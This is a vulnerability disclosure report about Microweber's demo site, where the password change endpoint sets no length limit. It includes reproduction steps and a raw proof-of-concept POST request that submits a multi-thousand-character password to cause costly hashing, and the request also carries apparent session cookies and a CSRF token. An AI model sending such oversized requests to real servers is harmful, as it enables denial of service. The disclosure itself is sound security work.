Description

Hey, when I attempt to change the password, I noticed that you haven't kept any password boundary. You need to limit password length. Hashing a large amount of data can cause significant resource consumption on behalf of the server and would be an easy target for an Application-level Denial Of Service attack.

Reproduction steps:

1. Navigate to "https://demo.microweber.org/demo/blog"

2. Click: John Doe (Edit profile)

3. Change password

4. Set New password = Boundless Characters/Special characters/Numbers

5. Confirm edit profile, Done

Proof of Concept

# Request 

POST /demo/api/save_user HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/page/create; csrf-token-data=%7B%22value%22%3A%222Utn6oLIsUeQAaTi9OoWKuaDwEpCC5VOb1MrfpoC%22%2C%22expiry%22%3A1652722744571%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=5WcF8Lu9MFINlPTt5mPVjsFtzU5XwwDoKRVAC2Zq
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 12093
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/blog
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Sec-Gpc: 1
Te: trailers
Connection: close

username=admin&email=demo%40microweber.com&first_name=Jhon&last_name=Doe&password=But+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foresee&password2=But+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foreseeBut+I+must+explain+to+you+how+all+this+mistaken+idea+of+denouncing+pleasure+and+praising+pain+was+born+and+I+will+give+you+a+complete+account+of+the+system%2C+and+expound+the+actual+teachings+of+the+great+explorer+of+the+truth%2C+the+master-builder+of+human+happiness.+No+one+rejects%2C+dislikes%2C+or+avoids+pleasure+itself%2C+because+it+is+pleasure%2C+but+because+those+who+do+not+know+how+to+pursue+pleasure+rationally+encounter+consequences+that+are+extremely+painful.+Nor+again+is+there+anyone+who+loves+or+pursues+or+desires+to+obtain+pain+of+itself%2C+because+it+is+pain%2C+but+because+occasionally+circumstances+occur+in+which+toil+and+pain+can+procure+him+some+great+pleasure.+To+take+a+trivial+example%2C+which+of+us+ever+undertakes+laborious+physical+exercise%2C+except+to+obtain+some+advantage+from+it%3F+But+who+has+any+right+to+find+fault+with+a+man+who+chooses+to+enjoy+a+pleasure+that+has+no+annoying+consequences%2C+or+one+who+avoids+a+pain+that+produces+no+resultant+pleasure%3F+On+the+other+hand%2C+we+denounce+with+righteous+indignation+and+dislike+men+who+are+so+beguiled+and+demoralized+by+the+charms+of+pleasure+of+the+moment%2C+so+blinded+by+desire%2C+that+they+cannot+foresee

Impact

Application-Level DoS

This allows for denial-of-service attacks through reworked submission of comprehensive passwords, tying up server resources in the expensive computation of the corresponding hashes.